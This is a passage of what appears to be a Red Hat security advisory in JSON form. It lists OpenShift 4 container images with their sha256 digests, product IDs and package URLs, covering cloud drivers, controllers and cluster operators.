"name": "registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9@sha256:d1a5ebdd8e8fcd15749e48a18cf340a309c6c219c8adf85d2df1caa773784d86_amd64",
"product_id": "registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9@sha256:d1a5ebdd8e8fcd15749e48a18cf340a309c6c219c8adf85d2df1caa773784d86_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-aws-ebs-csi-driver-rhel9@sha256%3Ad1a5ebdd8e8fcd15749e48a18cf340a309c6c219c8adf85d2df1caa773784d86?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775602036"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9-operator@sha256:ef09a660c5bd1b44464ed961ade4f9ceef47dfe1005efde15de94631dadebf4f_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9-operator@sha256:ef09a660c5bd1b44464ed961ade4f9ceef47dfe1005efde15de94631dadebf4f_amd64",
"product_id": "registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9-operator@sha256:ef09a660c5bd1b44464ed961ade4f9ceef47dfe1005efde15de94631dadebf4f_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-aws-ebs-csi-driver-rhel9-operator@sha256%3Aef09a660c5bd1b44464ed961ade4f9ceef47dfe1005efde15de94631dadebf4f?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775602004"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-aws-pod-identity-webhook-rhel9@sha256:15b866541c161693e74ad7106aec45b9713f81e1f3e2f10deb0822b58fbb884e_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-aws-pod-identity-webhook-rhel9@sha256:15b866541c161693e74ad7106aec45b9713f81e1f3e2f10deb0822b58fbb884e_amd64",
"product_id": "registry.redhat.io/openshift4/ose-aws-pod-identity-webhook-rhel9@sha256:15b866541c161693e74ad7106aec45b9713f81e1f3e2f10deb0822b58fbb884e_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-aws-pod-identity-webhook-rhel9@sha256%3A15b866541c161693e74ad7106aec45b9713f81e1f3e2f10deb0822b58fbb884e?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775557257"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-azure-cloud-controller-manager-rhel9@sha256:249b48b699ef21517d11a3533293184b1524b5907fec00593a98f0581363dc12_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-azure-cloud-controller-manager-rhel9@sha256:249b48b699ef21517d11a3533293184b1524b5907fec00593a98f0581363dc12_amd64",
"product_id": "registry.redhat.io/openshift4/ose-azure-cloud-controller-manager-rhel9@sha256:249b48b699ef21517d11a3533293184b1524b5907fec00593a98f0581363dc12_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-azure-cloud-controller-manager-rhel9@sha256%3A249b48b699ef21517d11a3533293184b1524b5907fec00593a98f0581363dc12?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775557692"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-azure-cloud-node-manager-rhel9@sha256:660ad818c22efdd4fb965ded889c7ed08b331cb8d50c145bd4a34e74158f790a_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-azure-cloud-node-manager-rhel9@sha256:660ad818c22efdd4fb965ded889c7ed08b331cb8d50c145bd4a34e74158f790a_amd64",
"product_id": "registry.redhat.io/openshift4/ose-azure-cloud-node-manager-rhel9@sha256:660ad818c22efdd4fb965ded889c7ed08b331cb8d50c145bd4a34e74158f790a_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-azure-cloud-node-manager-rhel9@sha256%3A660ad818c22efdd4fb965ded889c7ed08b331cb8d50c145bd4a34e74158f790a?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775557468"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-azure-cluster-api-controllers-rhel9@sha256:255b3979a3a054696f21f437998c892b5738cbbcdc021b0a22752f1d9bb48712_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-azure-cluster-api-controllers-rhel9@sha256:255b3979a3a054696f21f437998c892b5738cbbcdc021b0a22752f1d9bb48712_amd64",
"product_id": "registry.redhat.io/openshift4/ose-azure-cluster-api-controllers-rhel9@sha256:255b3979a3a054696f21f437998c892b5738cbbcdc021b0a22752f1d9bb48712_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-azure-cluster-api-controllers-rhel9@sha256%3A255b3979a3a054696f21f437998c892b5738cbbcdc021b0a22752f1d9bb48712?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775602036"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9@sha256:1452416d5cfd9acae6f0bf60da783ec8cf632784655f4602462cf380cd7fe518_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9@sha256:1452416d5cfd9acae6f0bf60da783ec8cf632784655f4602462cf380cd7fe518_amd64",
"product_id": "registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9@sha256:1452416d5cfd9acae6f0bf60da783ec8cf632784655f4602462cf380cd7fe518_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-azure-disk-csi-driver-rhel9@sha256%3A1452416d5cfd9acae6f0bf60da783ec8cf632784655f4602462cf380cd7fe518?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775602060"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9-operator@sha256:0f5c719b22dbba95b6d61db0c63ba8107689a7d61f6944e0d2dc5fa3e693d25e_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9-operator@sha256:0f5c719b22dbba95b6d61db0c63ba8107689a7d61f6944e0d2dc5fa3e693d25e_amd64",
"product_id": "registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9-operator@sha256:0f5c719b22dbba95b6d61db0c63ba8107689a7d61f6944e0d2dc5fa3e693d25e_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-azure-disk-csi-driver-rhel9-operator@sha256%3A0f5c719b22dbba95b6d61db0c63ba8107689a7d61f6944e0d2dc5fa3e693d25e?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775557684"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:980e2f5e0f0676e559e91d50e2927fb9bf2f598db0d1ba043440e04d76cf46b9_amd64",
"product": {
"name": "registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:980e2f5e0f0676e559e91d50e2927fb9bf2f598db0d1ba043440e04d76cf46b9_amd64",
"product_id": "registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:980e2f5e0f0676e559e91d50e2927fb9bf2f598db0d1ba043440e04d76cf46b9_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/azure-service-rhel9-operator@sha256%3A980e2f5e0f0676e559e91d50e2927fb9bf2f598db0d1ba043440e04d76cf46b9?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606981"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-azure-workload-identity-webhook-rhel9@sha256:4f54884bb854edec3a1a28ba089ddc068edc3ad0677637dd9b033a1c0ff8052c_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-azure-workload-identity-webhook-rhel9@sha256:4f54884bb854edec3a1a28ba089ddc068edc3ad0677637dd9b033a1c0ff8052c_amd64",
"product_id": "registry.redhat.io/openshift4/ose-azure-workload-identity-webhook-rhel9@sha256:4f54884bb854edec3a1a28ba089ddc068edc3ad0677637dd9b033a1c0ff8052c_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-azure-workload-identity-webhook-rhel9@sha256%3A4f54884bb854edec3a1a28ba089ddc068edc3ad0677637dd9b033a1c0ff8052c?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775557341"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:900e5ff2f8ea86f0864c6a3cd1707a620427189f5bfffa0bb0ea9a8c0ed85330_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:900e5ff2f8ea86f0864c6a3cd1707a620427189f5bfffa0bb0ea9a8c0ed85330_amd64",
"product_id": "registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:900e5ff2f8ea86f0864c6a3cd1707a620427189f5bfffa0bb0ea9a8c0ed85330_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-baremetal-cluster-api-controllers-rhel9@sha256%3A900e5ff2f8ea86f0864c6a3cd1707a620427189f5bfffa0bb0ea9a8c0ed85330?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775557282"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:37fe6420e98e7d1927492a7a40fd01578cfaf441530b7bf2f85cc7d593d7b097_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:37fe6420e98e7d1927492a7a40fd01578cfaf441530b7bf2f85cc7d593d7b097_amd64",
"product_id": "registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:37fe6420e98e7d1927492a7a40fd01578cfaf441530b7bf2f85cc7d593d7b097_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-baremetal-installer-rhel9@sha256%3A37fe6420e98e7d1927492a7a40fd01578cfaf441530b7bf2f85cc7d593d7b097?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775607663"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:a212996fe27771f82406dc36d68e07e29ecf975834c3cde6395b35cd259edbe9_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:a212996fe27771f82406dc36d68e07e29ecf975834c3cde6395b35cd259edbe9_amd64",
"product_id": "registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:a212996fe27771f82406dc36d68e07e29ecf975834c3cde6395b35cd259edbe9_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-baremetal-rhel9-operator@sha256%3Aa212996fe27771f82406dc36d68e07e29ecf975834c3cde6395b35cd259edbe9?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775557287"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:02c4fe2761b586f29c78d9419f0b90d98bee92b8d4fa47ec77dfe45795fab7fb_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:02c4fe2761b586f29c78d9419f0b90d98bee92b8d4fa47ec77dfe45795fab7fb_amd64",
"product_id": "registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:02c4fe2761b586f29c78d9419f0b90d98bee92b8d4fa47ec77dfe45795fab7fb_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cli-artifacts-rhel9@sha256%3A02c4fe2761b586f29c78d9419f0b90d98bee92b8d4fa47ec77dfe45795fab7fb?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775577250"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:4e885357cb52fffbb832d31d97400cfc629f26d5c38b4692379d08ba485f46d2_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:4e885357cb52fffbb832d31d97400cfc629f26d5c38b4692379d08ba485f46d2_amd64",
"product_id": "registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:4e885357cb52fffbb832d31d97400cfc629f26d5c38b4692379d08ba485f46d2_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cloud-credential-rhel9-operator@sha256%3A4e885357cb52fffbb832d31d97400cfc629f26d5c38b4692379d08ba485f46d2?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775607238"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:2320a5d225dccf8f02379818bee2e93ae87a8444698f20141f6a0425b1661601_amd64",
"product": {
"name": "registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:2320a5d225dccf8f02379818bee2e93ae87a8444698f20141f6a0425b1661601_amd64",
"product_id": "registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:2320a5d225dccf8f02379818bee2e93ae87a8444698f20141f6a0425b1661601_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/cloud-network-config-controller-rhel9@sha256%3A2320a5d225dccf8f02379818bee2e93ae87a8444698f20141f6a0425b1661601?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775572181"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:9a083427c52dcc2f9716408cf23991613eef7c41fb6eb1ee4841491276971039_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:9a083427c52dcc2f9716408cf23991613eef7c41fb6eb1ee4841491276971039_amd64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:9a083427c52dcc2f9716408cf23991613eef7c41fb6eb1ee4841491276971039_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-api-rhel9@sha256%3A9a083427c52dcc2f9716408cf23991613eef7c41fb6eb1ee4841491276971039?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606727"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:64dfc7beaf3a8cfdab85ba963db74971ca68b6cf614aa04279f4af3239806e4c_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:64dfc7beaf3a8cfdab85ba963db74971ca68b6cf614aa04279f4af3239806e4c_amd64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:64dfc7beaf3a8cfdab85ba963db74971ca68b6cf614aa04279f4af3239806e4c_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-authentication-rhel9-operator@sha256%3A64dfc7beaf3a8cfdab85ba963db74971ca68b6cf614aa04279f4af3239806e4c?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775572199"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:d94b765497d2fa316fbf4ec374572a5fba96a99b78dfe02b6ed6986e2b7782e6_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:d94b765497d2fa316fbf4ec374572a5fba96a99b78dfe02b6ed6986e2b7782e6_amd64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:d94b765497d2fa316fbf4ec374572a5fba96a99b78dfe02b6ed6986e2b7782e6_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-autoscaler-rhel9-operator@sha256%3Ad94b765497d2fa316fbf4ec374572a5fba96a99b78dfe02b6ed6986e2b7782e6?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775564820"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:59b6c20394bfa15bb36a9ac9b4ef03ae6bdadfcfd110c46fee13ac2abc9f6fa3_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:59b6c20394bfa15bb36a9ac9b4ef03ae6bdadfcfd110c46fee13ac2abc9f6fa3_amd64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:59b6c20394bfa15bb36a9ac9b4ef03ae6bdadfcfd110c46fee13ac2abc9f6fa3_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-baremetal-operator-rhel9@sha256%3A59b6c20394bfa15bb36a9ac9b4ef03ae6bdadfcfd110c46fee13ac2abc9f6fa3?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775573046"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:d9a9c57749c9d3e56e51d0b67ac5929949a900b1e6c96a4414366afc1ef4ba3b_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:d9a9c57749c9d3e56e51d0b67ac5929949a900b1e6c96a4414366afc1ef4ba3b_amd64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:d9a9c57749c9d3e56e51d0b67ac5929949a900b1e6c96a4414366afc1ef4ba3b_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-bootstrap-rhel9@sha256%3Ad9a9c57749c9d3e56e51d0b67ac5929949a900b1e6c96a4414366afc1ef4ba3b?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775572490"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:e53bfa8ab4ae569c697bba0b37c25afb495cc6cf324fb4ed50bd8ffc737c04f9_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:e53bfa8ab4ae569c697bba0b37c25afb495cc6cf324fb4ed50bd8ffc737c04f9_amd64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:e53bfa8ab4ae569c697bba0b37c25afb495cc6cf324fb4ed50bd8ffc737c04f9_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-capi-rhel9-operator@sha256%3Ae53bfa8ab4ae569c697bba0b37c25afb495cc6cf324fb4ed50bd8ffc737c04f9?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775564722"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:b2115e5268813615088ca48f0138ff6910b07513be4177cd74485d2d41f0e249_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:b2115e5268813615088ca48f0138ff6910b07513be4177cd74485d2d41f0e249_amd64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:b2115e5268813615088ca48f0138ff6910b07513be4177cd74485d2d41f0e249_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-cloud-controller-manager-rhel9-operator@sha256%3Ab2115e5268813615088ca48f0138ff6910b07513be4177cd74485d2d41f0e249?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604711"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:290f5dcc66373ff79cbcda33e6fbba989c48ae2bf8b623c57e065110e36524db_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:290f5dcc66373ff79cbcda33e6fbba989c48ae2bf8b623c57e065110e36524db_amd64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:290f5dcc66373ff79cbcda33e6fbba989c48ae2bf8b623c57e065110e36524db_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-config-api-rhel9@sha256%3A290f5dcc66373ff79cbcda33e6fbba989c48ae2bf8b623c57e065110e36524db?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604875"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:96fdf677680bf809356060d0af7fc9166608de5dc4d546e671f3071910558381_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:96fdf677680bf809356060d0af7fc9166608de5dc4d546e671f3071910558381_amd64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:96fdf677680bf809356060d0af7fc9166608de5dc4d546e671f3071910558381_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-config-rhel9-operator@sha256%3A96fdf677680bf809356060d0af7fc9166608de5dc4d546e671f3071910558381?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775557260"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:4cdff720094bd0b07e3dd6ae9b5b88756a890fd1ac39361629c44817766fe69e_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:4cdff720094bd0b07e3dd6ae9b5b88756a890fd1ac39361629c44817766fe69e_amd64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:4cdff720094bd0b07e3dd6ae9b5b88756a890fd1ac39361629c44817766fe69e_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-control-plane-machine-set-rhel9-operator@sha256%3A4cdff720094bd0b07e3dd6ae9b5b88756a890fd1ac39361629c44817766fe69e?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775564664"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:0ac703dd7441374f349bfeb3639c1a7e364c9764aeb4b9ac05ea7879cce4a5a1_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:0ac703dd7441374f349bfeb3639c1a7e364c9764aeb4b9ac05ea7879cce4a5a1_amd64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:0ac703dd7441374f349bfeb3639c1a7e364c9764aeb4b9ac05ea7879cce4a5a1_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256%3A0ac703dd7441374f349bfeb3639c1a7e364c9764aeb4b9ac05ea7879cce4a5a1?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606942"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:5d920d843fb0958a750b86ee532642adc3a77f5e060d54cfa5327e4f41465772_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:5d920d843fb0958a750b86ee532642adc3a77f5e060d54cfa5327e4f41465772_amd64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:5d920d843fb0958a750b86ee532642adc3a77f5e060d54cfa5327e4f41465772_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-dns-rhel9-operator@sha256%3A5d920d843fb0958a750b86ee532642adc3a77f5e060d54cfa5327e4f41465772?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775605268"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:cf1445e8c39362b8c0b4b29d56771dcdb15f99c71e922e3fddd6b1f7e7b275bc_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:cf1445e8c39362b8c0b4b29d56771dcdb15f99c71e922e3fddd6b1f7e7b275bc_amd64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:cf1445e8c39362b8c0b4b29d56771dcdb15f99c71e922e3fddd6b1f7e7b275bc_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-image-registry-rhel9-operator@sha256%3Acf1445e8c39362b8c0b4b29d56771dcdb15f99c71e922e3fddd6b1f7e7b275bc?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775572202"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:dd57d49a58a5111f6d067a3a943c9ac9b5a175972312dd83d5fbd224511c0d99_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:dd57d49a58a5111f6d067a3a943c9ac9b5a175972312dd83d5fbd224511c0d99_amd64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:dd57d49a58a5111f6d067a3a943c9ac9b5a175972312dd83d5fbd224511c0d99_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-ingress-rhel9-operator@sha256%3Add57d49a58a5111f6d067a3a943c9ac9b5a175972312dd83d5fbd224511c0d99?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775573139"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:636cac46aae879046a02123b395762387762e921c02421fbeac623feace69c70_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:636cac46aae879046a02123b395762387762e921c02421fbeac623feace69c70_amd64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:636cac46aae879046a02123b395762387762e921c02421fbeac623feace69c70_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-kube-apiserver-rhel9-operator@sha256%3A636cac46aae879046a02123b395762387762e921c02421fbeac623feace69c70?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604138"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:30a687482b427b9d447430e0e7ef60e310b9dae5032407b03da36d7795e134c9_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:30a687482b427b9d447430e0e7ef60e310b9dae5032407b03da36d7795e134c9_amd64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:30a687482b427b9d447430e0e7ef60e310b9dae5032407b03da36d7795e134c9_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-kube-cluster-api-rhel9-operator@sha256%3A30a687482b427b9d447430e0e7ef60e310b9dae5032407b03da36d7795e134c9?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604093"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:9ba38f81d114b4fa4e3523ec46ce02bdcd4b5a122d399968bb7d6f8eb8bba271_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:9ba38f81d114b4fa4e3523ec46ce02bdcd4b5a122d399968bb7d6f8eb8bba271_amd64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:9ba38f81d114b4fa4e3523ec46ce02bdcd4b5a122d399968bb7d6f8eb8bba271_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-kube-controller-manager-rhel9-operator@sha256%3A9ba38f81d114b4fa4e3523ec46ce02bdcd4b5a122d399968bb7d6f8eb8bba271?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775605097"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:9c67187eef0b78888e5299143dac7efa69d6c06fa44b9db0a92d4447f7333a0a_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:9c67187eef0b78888e5299143dac7efa69d6c06fa44b9db0a92d4447f7333a0a_amd64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:9c67187eef0b78888e5299143dac7efa69d6c06fa44b9db0a92d4447f7333a0a_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-kube-scheduler-rhel9-operator@sha256%3A9c67187eef0b78888e5299143dac7efa69d6c06fa44b9db0a92d4447f7333a0a?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604716"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:9073193ac055f63809d630f43508c41c2fa3bf07d6ca023667fd9fda5daf6117_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:9073193ac055f63809d630f43508c41c2fa3bf07d6ca023667fd9fda5daf6117_amd64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:9073193ac055f63809d630f43508c41c2fa3bf07d6ca023667fd9fda5daf6117_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256%3A9073193ac055f63809d630f43508c41c2fa3bf07d6ca023667fd9fda5daf6117?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775557255"
}
}
},
{
"category": "product_version",
